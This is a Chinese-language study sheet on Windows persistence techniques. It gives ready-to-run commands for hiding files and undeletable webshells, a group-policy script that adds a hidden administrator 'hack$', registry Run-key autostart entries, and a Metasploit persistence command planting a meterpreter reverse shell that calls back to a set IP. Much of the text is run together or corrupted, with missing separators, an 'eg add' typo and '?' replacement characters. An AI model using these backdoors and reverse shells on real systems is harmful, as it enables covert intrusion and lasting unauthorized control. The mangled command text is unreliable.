Windows權限維持學習
0x01 隱藏技巧
”真正“隱藏文件
使用attrib +s +a +h +r命令就是把原本的文件夾增加了系統文件屬性、存檔文件屬性、只讀
文件屬性和隱藏文件屬性。
attrib +s +a +h +r c:\test
這樣不管是否隱藏文件,此文件都不可見
取消:
attrib -s -a -h -r c:\test
系統文件夾圖標
1.將文件名重命名為 我的電腦.
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
(這個是注冊表里
面的clsid,打開過后也是我的電腦)
2.其他clsid
我的電腦 {20D04FE0-3AEA-1069-A2D8-08002B30309D}我的文檔 {450D8FBA-AD25-11D0-98A8-0800361B1103}撥號網絡 {992CFFA0-F557-101A-88EC-00DD010CCC48}控制面板 {21EC2020-3AEA-1069-A2DD-08002B30309D}計劃任務 {D6277990-4C6A-11CF-8D87-00AA0060F5BF}打印機 {2227A280-3AEA-1069-A2DE-08002B30309D}記事本 {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}網絡鄰居 {208D2C60-3AEA-1069-A2D7-08002B30309D}回收站 {645FF040-5081-101B-9F08-00AA002F954E}公文包 {85BBD920-42A0-1069-A2E4-08002B30309D}字體 {BD84B380-8CA2-1069-AB1D-08000948F534}Web 文件夾 {BDEADF00-C265-11d0-BCED-00A0C90AB50F}
畸形目錄
只需要在目錄名后面加兩個點(也可以是多個點),畸形目錄和windows版本有關聯。不是所有版本通用
創建目錄:
md a...\ ,
實際顯示為a..
復制文件:
copy file c:\dir\a...\file
url訪問:
/a.../file
刪除目錄:
rd /s /q a...\
測試后發現好像在某些系統版本是可以訪問目錄的,但是圖形化界面還是無法刪除
利用系統保留文件名創建圖形化界面無法刪除的webshell,只能用命令行刪除
Windows下不能夠以下面這些字樣來命名文件/文件夾,包括:
aux/com1/com2/prn/con/nul
但是通過cmd下是可以創建、刪除此類文件夾的,使用copy命令:
copy file \\.\c:\dir\aux.aspdel \\.\c:\dir\aux.asptype \\.\c:\dir\aux.asp
\\.\是Windows下的特性,創建文件的時候加上了那訪問的時候也必須加上
驅動級文件隱藏
驅動隱藏最典型的現象就是系統盤存在以下文件
xlkfs.datxlkfs.dllxlkfs.ini...
使用軟件
Easy file locker
0x02 組策略
因為其極具隱蔽性,因此可以利用來做服務器后門。可以通過這個后門運行某些程序或者
腳本,比如創建一個管理員用戶
echo offnet user hack$ test168 /addnet localgroup administrator hack$ /addexit
運行->gpedit.msc->計算機配置->Windows設置->腳本(啟動/關機),組策略中的這個后
門可以利用來運行腳本或者程序,嗅探管理員密碼等
0x03 注冊表-regedit
metasploit和sharpersist都提供了這種能力,在Windows登陸期間創建將執行任意負載的注
冊表的項。
Run: 該項下的鍵值即為開機啟動項,每一次隨著開機而啟動,作為持久化后門
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /vtest /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"/v test /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /vtest /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"/v test /t REG_SZ /d "C:\Program Files (x86)\test.exe" 說明:/v 是指所選項下要添加的值名;/ve 添加空白值名(無名稱);/t regkey數據類型,忽略則默認采用REG_SZ(S:字符串類型,Z:以零字節結尾)/d 要分配給添加的值名的數據,開機啟動C:\Program Files (x86)\1.py/f 強行修改現有注冊表項
cmd把用戶從用戶組中刪除(即使是管理員用戶也需要單獨屬于Administrator組,不能同
時屬于其他用戶組):
net localgroup 用戶組 用戶名 /delete
如果已經獲得提升的憑據(管理員和system權限),則最好使?本地計算機注冊表位置,
?不是當前?戶,因為有效負載將在每次 系統啟動時執?,?與使?系統身份驗證的?戶
?關。通常HKEY_LOCAL_MACHINE中的設置優先級要高于 HKEY_CURRENT_USER。此方法
也需要用戶單獨屬于Administrator組。
eg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /vtest /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce"/v test /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /vtest /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"/v test /t REG_SZ /d "C:\Program Files (x86)\test.exe"
另外兩個注冊表位置
允許紅隊人員通過執行任意有效負載或DLL來實現持久性,這些將在登陸期間執行,并且
需要管理員級別的特權(此方法也需要用戶單獨屬于Administrator組)。
reg add"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001"/v Pentestlab /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Dep end" /v Pentestlab /t REG_SZ /d "C:\Program Files (x86)\test.dll"
msf 注冊表dll注入權限維持
msf中帶有腳本和后期利用模塊來通過注冊表達到持久性,msf腳本將以vbs腳本的形式創
建一個有效負載,將負載拖放到磁盤上,并創建一個注冊表項,該注冊表項將在用戶登陸
期間運行該負載。
run persistence -U -P windows/meterpreter/reverse_tcp -i 5 -p 1234 -r 192.168.211.128 說明:-U #用戶登陸時啟用-P #指定payload-i #連接間隔時間-p #連接端口-r #連接主機
執行結果說明:
C:\Usersatha\AppData\Local\Temp\buFUzcFJpNNFu.vbs #vbs負載所在路勁HKCU\Software\Microsoft\Windows\CurrentVersion\Run\uoHiFnBHv #注冊表項所在路徑
